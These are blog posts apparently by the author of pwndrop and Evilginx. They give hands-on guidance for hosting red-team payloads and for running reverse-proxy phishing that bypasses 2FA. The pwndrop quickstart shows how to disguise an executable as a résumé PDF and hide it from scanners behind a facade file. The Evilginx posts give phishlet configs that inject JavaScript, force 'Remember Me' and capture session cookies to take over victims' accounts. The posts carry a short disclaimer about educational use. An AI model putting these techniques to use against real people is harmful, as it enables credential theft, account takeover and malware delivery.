For a long time I wanted a self-hosted Dropbox, which would allow me to easily upload and share files with custom URL paths. There is of course Python's SimpleHTTPServer, which has a decent fanbase, but I badly wanted something that would have a web UI with drag & drop interface and deployable with a single command. The idea was born. I knew I'd make a backend in GO, but I had no experience in using any of the modern frontend libraries. It was 2018 back then and I decided it will be a good opportunity to learn something new.

First came in an idea of using Angular.js, since it is a very robust and well supported framework. In the end, it turned out to be too bloated for my needs and the amount of things I had to learn to just to make a simple UI (I'm looking at you TypeScript) was staggering. I managed to get a proof of concept version working and then scratched the whole project to start anew, almost a year later.

Pwndrop - Self-hosting Your Red Team Payloads
You can see that I had absolutely no regrets killing off this monstrosity.

Then in 2019, a really smart and creative red teamer Jared Haight @jaredhaight released his C2 framework FactionC2 at TROOPERS19. I immediately fell in love with the web UI he did and after chatting a bit with him, I learned he used Vue.js. Vue seemed to be lightweight, relatively new and already pretty popular, which made it a perfect choice. Thanks Jared for inspiration!

I bought Vue.js course at Udemy and in few weeks I was ready to go. If you want to make a tool with a web interface, do check out Vue as it may fit your needs as well.

For my own and your convenience I got rid of all of the npm + webpack clutter to slim down the project as much as possible. When I found out that a small project like pwndrop requires 1000MB of preinstalled packages through npm init, the decision to put the project on a diet was made. I wanted to simplify working with the project as much as possible and cut out the unnecessary middleware. Even using webpack requires learning a ton on how to configure it and I definitely didn't want to spend any extra time on that. Now the project doesn't take more than 70MB of precious hard drive space.

All in all, I've detached the frontend entirely from the build process, allowing the UI files to reside in their own folder, making them easily accessible for modifications and updates. The backend, on the other hand, is a single executable file, which installs itself and runs as a daemon in a background.

My main goal was to dumb down the installation process to the greatest extent and I'm pretty proud of the outcome. The whole project has ZERO dependencies and can be installed as easily as copying the precompiled files to your server and entering a single command to install and launch the server.

Let's now jump into the most important part - the features!

Features

Here is the list of features, which you can use from the get-go in the release version.

Drag & drop uploading of files

Easily drag & drop your files onto pwndrop admin panel to upload them.

Pwndrop - Self-hosting Your Red Team Payloads

Works on mobile

Since the UI is made with Bootstrap, I made sure it is responsive and looks good on every device.

Fun way to use pwndrop on your phone is to take photos with phone camera through the admin panel and they will be automatically uploaded to your server.

Share files over HTTP, HTTPS and even WebDAV

Best part of pwndrop is that it is not just an ordinary web server. My main focus was to support serving files also over WebDAV, which is used for pulling 2nd stage payloads through variety of different methods.

You can even use it with your l33t "UNC Path 0-days" ;)

In the future I plan to also add support for serving files over SMB. This will also allow to steal Net-NTLMv2 hashes from the machines making the request.

Click any of the "copy link" buttons to get a shareable link in your clipboard.

Pwndrop - Self-hosting Your Red Team Payloads

Enable and disable your file downloads

You can enable or disable file's ability to be downloaded, with a single click. Disabled files will return 404 or follow the pre-configured redirection when requested.

Pwndrop - Self-hosting Your Red Team Payloads

Set up facade files to return a different file from the same URL

Each uploaded file can be set up with a facade file, which will be served when a facade is enabled.

For example, you may want to share a link to a Word document with your custom macro payload, but you don't want your macro to be analyzed by online scanners as soon as you paste the link. To protect your payload, you can upload a facade clean document file under your payload file.

When facade mode is enabled all online scanners requesting the file, will receive your clean facade file. This can give you a brief window of evading detection. To have your link return the payload file, you need to manually disable facade mode.

Pwndrop - Self-hosting Your Red Team Payloads

Create custom URL paths without creating directories

You can set whatever URL path you want for your payloads and pwndrop will always return a file when that URL is reached. There is no need to put files into physical directories.

By default, the tool will put every uploaded file under a randomly generated subdirectory. You can easily change it uploaded file's settings.

Pwndrop - Self-hosting Your Red Team Payloads

URL redirects to spoof file extension

Let's say you want to have a shared link, pointing to /download/Salary Charts 2020.docx, but after the user clicks it it should download an HTA payload Salary Charts 2020.docx.hta instead.

Normally you'd have to write some custom .htaccess files to use with Apache's mod_rewrite or fight with nginx configuration files.

With pwndrop you just need to specify the URL path, the file should automatically redirect to.

Pwndrop - Self-hosting Your Red Team Payloads

I will describe the whole setup process in the Quickstart section below.

Change MIME types

In most web servers, web server decides what should be the MIME type of the downloaded file. This gives the web browser information what to do with a file once it is downloaded.

For example a file with text/plain MIME type will be treated as a simple text file and will be displayed in the browser window. The same text file with application/octet-stream MIME type will be treated as a binary file and the browser will save it to a file on disk.

Pwndrop - Self-hosting Your Red Team Payloads

This allows for some interesting manipulation, especially with MIME type confusion exploits.

You can find the list of common MIME types here.

Pwndrop - Self-hosting Your Red Team Payloads

Automatic retrieval of TLS certificates from LetsEncrypt

Once you install pwndrop and point your domain's DNS A records to it, the first attempted HTTPS connection to pwndrop will initiate an automatic retrieval of a TLS certificate from LetsEncrypt.

Secure connections should work out of the box, but do check the readme on Github to learn more about setting it up, especially if you want to use the tool locally or without a domain.

Password protected and hidden admin panel

I wanted to make sure that the admin panel of pwndrop is never visible to people who are not meant to see it. Being able to control the web server fully, I was able to completely lock down access to it. If the viewer's web browser does not have the proper authorization cookie, pwndrop will either redirect to predefined URL or return a 404.

In order to authorize your browser, you need to open a secret URL path on your pwndrop domain. The default path is /pwndrop and should be changed in the settings as soon as the tool is deployed to your server.

Pwndrop - Self-hosting Your Red Team Payloads
Remember to change Secret Path to something unique

If you want to relock access to the admin panel, just change the Secret-Cookie name or value and you will need to visit the Secret-Path again, in order to regain access.

Quickstart

Now that I hope I've managed to highlight all of the features. I wanted to give you a rundown of how to set up your first uploaded file with a facade and redirection.

Goal: Host our payload.exe payload and disguise it as https://www.evilserver.com/uploads/MyResume.pdf shared link. The payload file will be delivered through redirection as MyResume.pdf.exe. The MyResume.pdf file will be set up as a facade file and it will be served as a legitimate PDF file if facade mode is enabled, in order to temporarily hide its true form from online scanners.

Here we go.

0. Deployment

If you don't yet have the server to deploy pwndrop to I highly recommend Digital Ocean. The cheapest $5/mo Debian 9 server with 25GB of storage space will work wonders for you. You can use my referral link to get an extra $100 to spend on your servers in 60 days for free.

I won't be covering the deployment process of pwndrop here on the blog as it may get outdated at some point. Instead check out the always up-to-date README with all the deployment instructions on Github.

If you are in a hurry, though, you can install pwndrop on Linux with a single command:

curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash

1. Upload your payload executable file

Make sure you authorize your browser first, by opening: https://<yourdomain.com>/pwndrop

Then open https://<yourdomain.com> and follow the instructions on the screen to create your admin account.

IMPORTANT! Do not forget to change the Secret-Path from /pwndrop to something of your choice in the settings.

Use the Upload button or drag & drop payload.exe onto pwndrop to upload your payload file.

Pwndrop - Self-hosting Your Red Team Payloads

2. Upload your PDF facade file

Click the top-left cog icon on your newly uploaded file and the settings dialog will pop out.

Click the facade file upload area or directly drop MyResume.pdf file onto it.

Pwndrop - Self-hosting Your Red Team Payloads

3. Set up redirection

Now you need to change the Path to what it should look like in your shared link. We want it to point to MyResume.pdf so change it to, say: /uploads/MyResume.pdf (you can choose whatever path you want).

Then click the Copy button at the right side of Redirect Path editbox and it will copy the contents of Path editbox to the editbox below.

Just add .exe to the copied path making it /uploads/MyResume.pdf.exe. This will be the path pwndrop redirects to, to serve the payload executable after the user clicks the shared link.

Keep in mind that the redirection will only happen when facade mode is disabled. When facade mode is enabled, pwndrop will serve the facade PDF file instead, not triggering any red flags.

We will also change the MIME type of the facade file, which will show you the power of this feature. While application/x-msdownload MIME type for PDF facade file is valid, the Chrome browser will initiate a download when the shared link is clicked. When you change the MIME type to application/pdf , though, Chrome will open the preview of the PDF file as it will know it is dealing with a PDF file.

Depending on what effect you want to achieve, either having the user download the PDF or have it previewed in the web browser, you can play with different options.

Pwndrop - Self-hosting Your Red Team Payloads

Don't forget to click Save once you're finished with setting up the file.

4. Sharing your file

Now you're done. You can get the HTTP shared link, by clicking the HTTP button. http:// or https:// prefix will be picked based on how you're currently browsing the admin panel. Similarly, if you click the WebDAV button, you will get the WebDAV link copied to your clipboard.

Pwndrop - Self-hosting Your Red Team Payloads

If you ever decide, you want to temporarily disable sharing for this file, just click the power button and it will effectively make the file hidden and links to it will stop working.

Pwndrop - Self-hosting Your Red Team Payloads

Next important thing is enabling the facade. Just click the third button from the left to flip the on/off switch to enable/disable facade mode. When the facade mode is enabled, pwndrop will serve the facade file, which you've uploaded for the given payload, instead of the original payload file. In our example it will deliver the PDF file instead of the payload executable.

Pwndrop - Self-hosting Your Red Team Payloads

Aaand that's it. Enjoy your first shared payload! Hope I've managed to not make the process too complex and that it was pretty easy to follow.

Future Development

I have a lot of ideas I want implemented into pwndrop, but instead of never releasing the tool and keep adding features, because "it is always not yet perfect", I've decided to release the tool as it is now. I will iteratively expand on it by adding new features from time to time.

So before you send me your feedback, check out what I plan to implement in near and far future. I really want to hear what features you'd like to see and how you'd want to use the tool.

Download Counter

This one should be implemented quite fast. It would add a download counter for each file, specifying the number of times the file is allowed to be downloaded. When the limit is reached, pwndrop will either serve a facade file or return file not found.

Download Tracker

This feature is a much needed one, but requires a bit of work. I want to add a separate view panel, which will display in real-time all download requests for every payload file. The log should contain the visitor's User-Agent, IP address and some additional metadata that can be gathered from the particular request.

File dropping with Javascript

There is a method to initiate a file download directly through Javascript executed on an HTML page. It is an effective method for bypassing request scanners of several EDRs.

The idea is that the whole payload file gets embedded into an HTML page as an encrypted blob, which is then decrypted in real-time and served as a download to the web browser. That way there is never a direct request made to a file resource with specific URL, meaning there is nothing to download and scan. EDRs would have to implement Javascript emulation engines in order to execute a dropper script in a sandbox and analyze the decrypted payload.

Conditional facades

At the moment, facade mode can only be enabled/disabled manually, but eventually I'd like this process to be somewhat automated. Pwndrop could check if the request is made with specific cookie, User-Agent or from targeted IP range and then decide whether to serve a payload file or a facade file instead.

Password protected downloads

Sometimes it is good to share a file, which downloads only after entering a valid password. This is the feature I'd also like to have in pwndrop. I'm not yet sure if it should be done with basic HTTP authentication or something custom. Let me know if you have any ideas.

The End (for now!)

This is only the end of this post, but definitely not the end of pwndrop's development. I'd really like to see how you, the red teamers, plan to use this tool and how it can aid you in managing your payloads.

I also hope that you can use this tool not only for work. I hope it helps you share any files you want with the people you want, without having to worry about privacy and/or security issues. Self-hosting is always the best way to go.

Expect future updates on this blog and if you have any feedback you want to share, do contact and follow me on Twitter @mrgretzky.

Get the latest version of pwndrop here:

Enjoy and I'm waiting for your feedback!

Evilginx 2.3 - Phisherman's Dream

Evilginx 2.3 - Phisherman's Dream

Welcome to 2019!

As was noted, this will be the year of phishing automation. We've already seen a release of new reverse-proxy tool Modlishka and it is only January.

This release would not have happened without the inspiration I received from Michele Orru (@antisnatchor), Giuseppe Trotta (@Giutro) and Piotr Duszyński (@drk1wi). Thank you!

This is by far the most significant update since the release of Evilginx. The 2.3 update makes it unnecessary to manually create your own sub_filters. I talked to many professional red teamers (hello @_RastaMouse) who have struggled with creating their own phishlets, because of the unfair, steep learning curve of figuring out what strings to replace and where, in the proxied HTTP content. I can proudly say that these days are over and it should now be much easier to create phishlets from scratch.

If you arrived here by accident and you have no idea what I'm talking about, check out the first post on Evilginx. It is a phishing framework acting as a reverse proxy, allowing to bypass 2FA authentication.

Let's jump straight into the changes.

Changelog - version 2.3

Here is a full list of changes in this version:

  • Proxy can now create most of required sub_filters on its own, making it much easier to create new phishlets.
  • Added lures, with which you can prepare custom phishing URLs, each having its own set of unique options (help lures for more info).
  • Added OpenGraph settings for lures, allowing to create enticing content for link previews.
  • Added ability to inject custom Javascript into proxied pages.
  • Injected Javascript can be customized with attacker-defined data, specified in lure options.
  • Deprecated landing_path and replaced it with a login section, which contains the domain and path for website's login page.

Diving into more detail now.

Automatic handling of sub_filters

In order for Evilginx to properly proxy a website, it must not stray off its path and it should make sure that all proxied links and redirections are converted from original URLs to the phishing URLs. If the browser navigates to the original URL, the user will no longer be proxied through Evilginx and the phishing will simply fail.

I am aware it was super hard to manually figure out what strings to replace and it took considerable amounts of time to analyze HTML content of every page to manage substitutions, using trial and error method.

Initially I thought that doing the automatic URL substitution, in page body, will just not work well. The guys I mentioned at the top of this post, proved me wrong and I was amazed how well it can work when properly executed. When I saw this method successfully implemented and demonstrated in Modlishka, I was blown away. I knew I had to try and do the same for Evilginx.

It took me a whole weekend to implement the required changes and I'm very happy with the outcome. You can now start creating your phishlet without any sub_filters at all. Just define the proxy_hosts for the domains and subdomains that you want to proxy through and it should work out-of-the-box. You may need to create your own sub_filters only if there is some unusual substitution required to bypass security checks or you just want to modify some HTML to make the phishing scenario look better.

Best thing with automated sub_filters generation is the fact that the whole website's functionality may fully work, through the proxy, even after the user is authenticated (e.g. Gmail's inbox).

Phishing with lures

The tokenized phishing link with redirection URL, encoded in base64 format, was pretty ugly and definitely not perfect for carefully planned phishing attacks. As an improvement, I thought of creating custom URLs with attacker-defined path. Each assigned with a different redirection URL, which would be navigated to on successful authentication through the phishing proxy. This idea eventually surfaced in form of lures.

Evilginx 2.3 - Phisherman's Dream

You can now create as many lures as you want for specific phishlets and you are able to give each of them following options:

  • Custom path to make your phishing URLs look more inviting to be clicked.
  • Redirection URL to navigate the user to, after they successfully authenticate.
  • OpenGraph features, which will inject <og:...> meta tags into proxied website to make the phishing links generate enticing previews when sent in messengers or posted to social media.
  • Customized script content, which will be embedded into your injected Javascript code (e.g. for pre-filling the user's email address).
  • Description for your own eyes to not forget what the lure was for.

Here is how OpenGraph lure configuration can be used to generate an enticing preview for WhatsApp:

Evilginx 2.3 - Phisherman's Dream

On clicking the link, the user will be taken to the attacker-controlled proxied Google login page and on successful authentication, he can be redirected to any document hosted on Google Drive.

The command for generating tokenized phishing links through phishlets get-url still works, although I'd consider it obsolete now. You should now generate phishing URLs with pre-created lures instead: lures get-url 0

To get more information on how to use lures, type in help lures and you will get a list of all sub-commands you can use.

Javascript injection

Now you can inject any javascript code into the proxied HTML content, based on URL path or domain. This gives incredible capabilities for customizing your phishing attack. You could for example make the website pre-fill the email of your target in the authentication form and display their profile photo.

Here is the example of injected javascript that pre-fills the target's email on LinkedIn login page:

js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/uas/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);

You can notice that the email value is set to {email}, which lets Evilginx know that this will be replaced with the value set in the created lure. Setting the email value would be done the following way.

: lures edit params 0 [email protected]

See that the trigger_params variable contains the email value, which means that this javascript will ONLY be injected if the email parameter is configured in the lure used in the phishing attack.

Here is a demo of what a creative attacker could do with Javascript injection on Google, pre-filling his target's details for him:

Evilginx 2.3 - Phisherman's Dream

Removal of landing_url section

To upgrade your phishlets to version 2.3, you have to remove landing_url section and replace it with a login section.

I figured you may want to use a different domain for your phishing URL than the one, which is used to display the login page. For example Google's login page is always at domain accounts.google.com, but you may want the phishing link to point to a different sub-domain like docs.phished-google.com. That way you can add docs.google.com to proxy_hosts and set the option to is_landing: true.

The login section should contain:

login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'

IMPORTANT! The login section always defines where the login page resides on the targeted website.

That way the user will be automatically redirected to the login page domain even when the phishing link originated on a different domain.

Refer to the official phishlets 2.3.0 documentation for more information.

Have fun!

I can proudly say that now the phishlet format is close to being perfect and, since the difficulty of creating one from scratch significantly dropped, I will be starting a series of blog posts teaching how to create a phishlet from scratch, including how to configure everything.

The series will start very soon and posts will be written in hands-on step by step format, showing the whole process of phishlet creation from start to finish, for the website that I pick.

Make sure to follow me on Twitter if you want up-to-date information on Evilginx development.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.2 - Jolly Winter Update

Evilginx 2.2 - Jolly Winter Update

Tis the season to be phishing!

I've finally found some free time and managed to take a break to work on preparing a treat for all of you phishing enthusiasts out there. Just in time for the upcoming holiday season, I present you the chilly Evilginx update.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

If you've arrived here by accident and have no idea what I'm writing about, do check the first post about Evilginx 2 release.

Without further ado, let's jump straight into the changelog!

Changelog - version 2.2

First, here is a full list of changes made in this version.

  • Added option to capture custom POST arguments additionally to credentials. Check custom field under credentials.
  • Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication.
  • Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
  • Removed name field from phishlets. Phishlet name is now determined solely based on the filename.
  • Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured.
  • Regular expression groups working with sub_filters.
  • Phishlets are now listed in a table.
  • Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
  • All search fields in the phishlet are now regular expressions by default. Remember about proper escaping!

Now for the details.

Added option to capture custom POST arguments

You can now capture additional POST arguments in requests. Some people mentioned they often need to capture data from other fields like PINs or tokens. Now you can.

Captured field values can be viewed in captured session details.

Evilginx 2.2 - Jolly Winter Update

Find out how to specify custom fields for capture in the official documentation.

Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication

Almost all websites provide an option to login, without permanently remembering the logged in user. This results in the website storing only temporary session cookies or cookies with short lifespan, which are later invalidated both on the server and the client.

Capturing session cookies, in such scenario, does not give the attacker permanent access. This is why it is most important that phished user ticks the "Remember Me" checkbox to inform the server that persistent authentication is requested. Till now that rested on phished user's shoulders and they could make the decision.

In this version it is now possible to inject an argument into the POST request to inform the server that the "Remember Me" checkbox was ticked (even though it could've been deliberately left unchecked).

As an example, this part of a phishlet will detect the login POST request, containing username and password fields and will add/replace the remember_me parameter to always have a value of 1:

force_post:
  - path: '/sessions'
    search:
      - {key: 'session\[user.*\]', search: '.*'}
      - {key: 'session\[pass[a-z]{4}\]', search: '.*'}
    force:
      - {key: 'remember_me', value: '1'}
    type: 'post'

Play around with it and I'm sure this feature may have other uses that I haven't thought about yet.

Remade phishlet YAML file format

Preparing for a final version of the phishlet file format, I did some restructuring of it. You will need to do some minor modifications to your custom phishlets, to make them compatible with Evilginx 2.2.0.

I've now also properly documented the new phishlet file format, so please get familiar with it here:
Phishlet File Format 2.2.0 Documentation

Removed name field from phishlets

Many of you reported proxy returning TLS errors when testing your own custom phishlets. They were caused by custom phishlets having the same name as another loaded phishlet.

That name field caused enough confusion, so I decided to remove it altogether. Phishlet name is now solely determined by the phishlet filename without the .yaml suffix. This should provide full uniqueness for each phishlet name as two same filenames can't exist in same directory, from which phishlets are loaded from.

Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured

In previous versions, whenever any of auth_urls triggered the session capture, the redirection would happen immediately, before Evilginx could parse the response, received from the server.

This resulted in Evilginx not being able to parse and capture cookies returned in responses to that last request that would trigger the session capture and redirection.

This is now changed and you can safely pick the trigger URL path that still returns session cookies in the response, as they will be captured and saved, before the redirection happens.

Regular expression groups working with sub_filters

I've been asked about it recently and upon checking, I figured out that it has already been implemented since Evilginx release.

You can define a regular expression group, as you'd normally do, with parenthesis in search field and later refer to it in replace field with ${1}, where 1 is the group index and you can naturally use more than one group.

Example:

  - {triggers_on: 'www.linkedin.com', orig_sub: 'cdn', domain: 'linkedinapis.com', search: '//{hostname}/([0-9a-z]*)/nhome/', replace: '//{hostname}/${1}/nhome/', mimes: ['text/html', 'application/json']}

Refer to GO language documentation to see exactly how it works (make sure to see the example section):
https://golang.org/pkg/regexp/#Regexp.ReplaceAllString

Phishlets are now listed in a table

Simply said - phishlets listing was an ugly mess. Now it looks good.

Evilginx 2.2 - Jolly Winter Update

Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises

Evilginx will now validate each phishlet on loading. It will try its best to inform you about any detected issues with an error message to make it easier to debug any accidental mistakes like typos or missing fields.

All search fields in the phishlet are now regular expressions by default

The phishlet documentation now specifies which fields are considered to be regular expressions, so do remember about proper escaping of regular expression strings.

As a quick example, if you used to look for login.username POST key to capture its value, you need to now define the field as key: 'login\.username', because . is one of the special characters used in regular expressions, which has a separate function.

Enjoy!

As always, I wanted to thank everyone for amazing feedback and providing ideas to improve Evilginx.

Keep the bug reports and feature requests incoming!

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.1 - The First Post-Release Update

Evilginx 2.1 - The First Post-Release Update

About 2 months ago, I've released Evilginx 2. Since then, a lot of you reported issues or wished for specific features.

Your requests have been heard! I've finally managed to find some time during the weekend to address the most pressing matters.

[>> Download Evilginx 2 from GitHub <](https:>

Here is what has changed and how you can use the freshly baked features.

Changelog - version 2.1

Developer mode added

It is finally much easier to develop and test your phishlets locally. Start Evilginx with -developer command-line argument and it will switch itself into developer mode.
In this mode, instead of trying to obtain LetsEncrypt SSL/TLS certificates, it will automatically generate self-signed certificates.

Evilginx will generate a new root CA certificate when it runs for the first time. You can find the CA certificate at $HOME/.evilginx/ca.crt or %USERPROFILE%\.evilginx\ca.crt. Import this certificate into your certificate storage as a trusted root CA and your browsers will trust every certificate, generated by Evilginx.

Since this feature allows for local development, there is no need to register a domain at domain registrars. Just use any domain you want and set the server IP to 127.0.0.1 or your LAN IP:

config domain anydomainyouwant.com
config ip 127.0.0.1

It is important that your computer redirects all connections to phishing sites, to your local IP address. In order to do that, you need to modify the hosts file.

First, generate the hosts redirect rules with Evilginx, for the phishlet you want:

: phishlets hostname twitter twitter.anydomainyouwant.com
: phishlets get-hosts twitter

127.0.0.1 twitter.anydomainyouwant.com
127.0.0.1 abs.twitter.anydomainyouwant.com
127.0.0.1 api.twitter.anydomainyouwant.com

Copy the command output and paste it into your hosts file. The hosts file can be found at:
Linux: /etc/hosts
Windows: %WINDIR%\System32\drivers\etc\hosts

Remember to enable your phishlet and you can start using Evilginx locally (can be useful for demos too!).

Authentication cookie detection was completely rewritten

There were some limitations in the initial implementation of session cookie detection, so I rewrote a significant portion of its code. Now, Evilginx is able to detect and properly use httpOnly and hostOnly flags, as well as path values for each captured cookie.

IMPORTANT! Previously captured sessions will not load properly with latest version of Evilginx, so make sure you backup your captured sessions before updating.

Evilginx will now properly handle cookie domains .anydomain.com vs anydomain.com. This is very important as I've noticed, during testing, the imported cookies will not provide a working session if cookie domain is set improperly.

The difference between each is, that cookie set for domain .anydomain.com will be sent in requests to anydomain.com and also to any sub-domain of .anydomain.com (e.g. auth.anydomain.com), while the cookie set for domain anydomain.com will be sent only with requests to anydomain.com.

I had to also update current phishlets to properly detect cookie domain names (with . prefix or without), so you may also need to update your private ones, accordingly.

Regular expressions for cookie names and POST key names

It has come to my attention that some websites will dynamically generate cookie names or POST key names, based on user ID or some other factors. Since Evilginx was only able to look for fixed names, it would never be able to properly capture such cookies or intercept a username/password field in POST request.

Now, you can enter regular expressions for both cookie names and POST user_regex and pass_regex, by adding regexp to the string, after a comma , separator.

Here is the example. Let's say we want to capture a cookie that has the name session_user_738299, where 738299 is the user ID, which will be different for every user and thus will be a dynamic value. We can set up capturing of this cookie with regular expressions, like this (considering that the numerical value is always 6 digits):

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['session_user_[0-9]{6},regexp']

This also can be done for POST keys. If we need to intercept a POST key, that will hold a username, with name user[session_id_36273], we can do:

user_regex:
  key: 'user\[session_id_.*\],regexp'
  re: '(.*)'

Same applies to pass_regex of course.

URL path detection for triggering session capture

You will find websites that set the session cookie ID before you even start typing your email in the login form. In such cases, Evilginx would detect the session cookie, capture it and since it was the last cookie it was meant to capture, it would consider the session captured. This would not be the case, since even no credentials were entered.

As smart people pointed out on Github, this can be remedied by detecting an HTTP request to specific URL path, which happens only after the user has successfully authenticated (e.g. /home).

Now you can add a new parameter in your phishlet auth_urls, where you provide an array of URL paths that will trigger the session capture. If we wanted to look for HTTP request to /home, we could do set it up like this:

auth_urls:
  - '/home'

With auth_urls set up in the phishlet, Evilginx will not trigger a session capture even when it considers all session cookies captured. These cookies will be stored only after the HTTP request to any of the specified URL paths happens.

IMPORTANT! URL paths in auth_urls are all considered regular expressions, so proper escaping may be required (also no need to add ,regexp to each string)

There is now a cool trick that utilizes both auth_urls feature and regular expressions for cookie names.

If you ever come across a website that sends cookies in such a way that makes them impossible to detect with regular expressions, you can just opt for capturing all the cookies for a given domain and waiting for the URL trigger.

This is how you'd do it:

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['.*,regexp'] # captures all cookies for that domain
auth_urls:
  - '/home' # saves all captured cookies when this request is made

This is a very messy approach and I'd prefer to not see phishlets rely on that too much, but it can be done.

Empty subdomains now work

There was a bug that would prevent phishlets to work for websites that do not use any subdomains for some of their hostnames. This is no longer an issue and as an example to prove that it is fixed, I've slightly modified the twitter phishlet to work with twitter.com hostname.

Wrapping up

Keep posting issues you are having with creating your own phishlets as I'm sure there will still be scenarios that will require some adjustments made to Evilginx.

You can update by pulling latest changes to the master branch. I will post a binary release once I confirm that everything is stable.

[>> Follow me on Twitter <](https:>
[>> Download Evilginx 2 from GitHub <](https:>

I have some nice ideas still for upcoming releases like dynamic custom Javascript injection and forcing "Remember Me" check boxes by POST parameter injection.

Hope you are liking Evilginx so far.

Enjoy this update!

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Evilginx 2 - Next Generation of Phishing 2FA Tokens

It's been over a year since the first release of Evilginx and looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have even expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and Techcrunch would write about it!

At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn GO and rewrite Evilginx as a standalone application. It is amazing how GO seems to be ideal for offensive tools development and bettercap is its best proof!

This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release.

Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features.

Update: Check also version 2.1 release post

TL;DR What am I looking at?

Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties.

Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also captures authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on user's account (except for U2F - more about it further below).

Even if phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over his/her account. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys.

Take a look at the video demonstration, showing how attacker's can remotely hack an Outlook account with enabled 2FA.

Disclaimer: Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments with written permission from to-be-phished parties. Goal is to show that 2FA is not a silver bullet against phishing attempts and people should be aware that their accounts can be compromised, nonetheless, if they are not careful.

[>> Download Evilginx 2 from GitHub <](https:>
**Remember - 2FA is not a silver bullet against phishing!**

2FA is very important, though. This is what head of Google Threat Intelligence had to say on the subject:

2FA is super important but please, please stop telling people that by itself it will protect people from being phished by the Russians or governments. If attacker can trick users for a password, they can trick them for a 6 digit code.

— Shane Huntley (@ShaneHuntley) July 22, 2018

Old phishing tactics

Common phishing attacks, we see every day, are HTML templates, prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters his/her username and password, the credentials are logged and attack is considered a success.

I love digging through certificate transparency logs. Today, I saw a fake Google Drive landing page freshly registered with Let's Encrypt. It had a hardcoded picture/email of presumably the target. These can be a wealth of info that I recommend folks checking out. pic.twitter.com/PRweQsgHKD

— Justin Warner (@sixdub) July 22, 2018

This is where 2FA steps in. If phished user has 2FA enabled on their account, the attacker would require an additional form of authentication, to supplement the username and password they intercepted through phishing. That additional form of authentication may be SMS code coming to your mobile device, TOTP token, PIN number or answer to a question that only the account owner would know. Attacker not having access to any of these will never be able to successfully authenticate and login into victim's account.

Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA.

Phishing 2.0

What if it was possible to lure the victim not only to disclose his/her username and password, but also to provide the answer to any 2FA challenge that may come after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good. Challenge will change with every login attempt, making this approach useless.

After each successful login, website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and is saved for future use. From that point, every request sent from the browser to the website will contain that session token, sent as a cookie. This is how websites recognize authenticated users after successful authentication. They do not ask users to log in, every time when page is reloaded.

This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens.

This is what it looks like, in Evilginx 2, when session token cookie is successfully captured:
Evilginx 2 - Next Generation of Phishing 2FA Tokens

Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer?

Common phishing attacks rely on creating HTML templates which take time to make. Most work is spent on making them look good, being responsive on mobile devices or properly obfuscated to evade phishing detection scanners.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Evilginx takes the attack one step further and instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet, coming from victim's browser, is intercepted, modified and forwarded to the real website. The same happens with response packets, coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim side everything looks as if he/she was communicating with the legitimate website. User has no idea idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies.

You may ask now, what about encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication data? Good question. Problem is that the victim is only talking, over HTTPS, to Evilginx server and not the true website itself. Evilginx initiates its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, only to act as a client itself and establish its own HTTPS connection with the destination website, where it sends the re-encrypted packets, as if it was the victim's browser itself. This is how the trust chain is broken and the victim still sees that green lock icon next to the address bar, in the browser, thinking that everyone is safe.

